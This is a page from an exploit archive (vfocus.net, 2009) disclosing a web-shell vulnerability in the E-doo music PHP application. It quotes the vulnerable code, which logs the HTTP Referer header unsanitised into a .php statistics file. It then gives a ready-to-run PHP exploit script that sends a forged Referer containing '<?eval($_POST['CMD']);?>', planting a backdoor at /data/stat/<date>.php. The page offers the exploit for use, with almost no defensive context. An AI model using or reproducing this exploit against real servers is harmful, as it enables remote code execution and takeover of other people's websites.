首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
E-doo music get shell Vulnerability
来源:vfocus.net 作者:vfocus 发布时间:2009-11-06  
index.php line 10
  1. $data_name=get_date();  
  2.   
  3. ... ...  
  4.   
  5. $from=$_SERVER["HTTP_REFERER"];  
  6.   
  7. ... ...  
  8.   
  9. if(file_exists("$sys_data_dir/stat/$data_name.php"))  
  10. {  
  11. $stat_data=file("$sys_data_dir/stat/$data_name.php");  
  12. for($a=0;$a<count($stat_data);$a++)  
  13.     {  
  14.     $stat_info=explode("|",$stat_data[$a]);  
  15.     if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)//如果此IP已经访问且访问时间小于访问记录时间,退出循环  
  16.         {  
  17.         break;  
  18.         }  
  19.     if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)//如果此IP已经访问但访问时间大于访问记录时间,进行写入操作  
  20.         {  
  21.         $tod_data=readfrom("$sys_data_dir/stat/$data_name.php");  
  22.         $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;  
  23.         writeto("$sys_data_dir/stat/$data_name.php",$new_data);  
  24.         break;  
  25.         }  
------------------------------------------------------------------------------------
伪造http_referer 写入得shell /data/stat/年-月-日.php
------------------------------------------------------------------------------------
EXP:
  1. <?  
  2. $server = '';    //host  
  3. $host = '';    //host  
  4. $target = '/index.php';    //vul file  
  5. $referer = '<?eval($_POST['CMD']);?>';    // Referer  
  6. $port = 80;  
  7. $fp = fsockopen($server$port$errno$errstr, 30);  
  8. if (!$fp)   
  9. {  
  10.   echo "$errstr ($errno)<br />\n";  
  11. }   
  12. else   
  13. {  
  14.         $out = "GET $target HTTP/1.1\r\n";  
  15.         $out .= "Host: $host\r\n";  
  16.         $out .= "Cookie: ASPSESSIONIDSQTBQSDA=DFCAPKLBBFICDAFMHNKIGKEG\r\n";  
  17.         $out .= "Referer: $referer\r\n";  
  18.         $out .= "Connection: Close\r\n\r\n";  
  19.         fwrite($fp$out);  
  20.         while (!feof($fp))   
  21.         {  
  22.                 echo fgets($fp, 128);  
  23.         }  
  24.         fclose($fp);  
  25. }  
  26. ?> 

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Blender .blend Project Arbitra
·Remote buffer overflow exploit
·This is a proof of concept exp
·Linux Kernel 'pipe.c' Local Pr
·Mac OS X 10.5.6/10.5.7 ptrace(
·Linux 2.6.x fs/pipe.c local ro
·Linux 2.6.31 fs/pipe.c local r
·PunBB Extension Attachment ver
·Xion Audio Player version 1.0
·Internet Explorer DoS Exploit
·Symantec ConsoleUtilities Acti
·Safari 4.0.3 (Win32) CSS Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved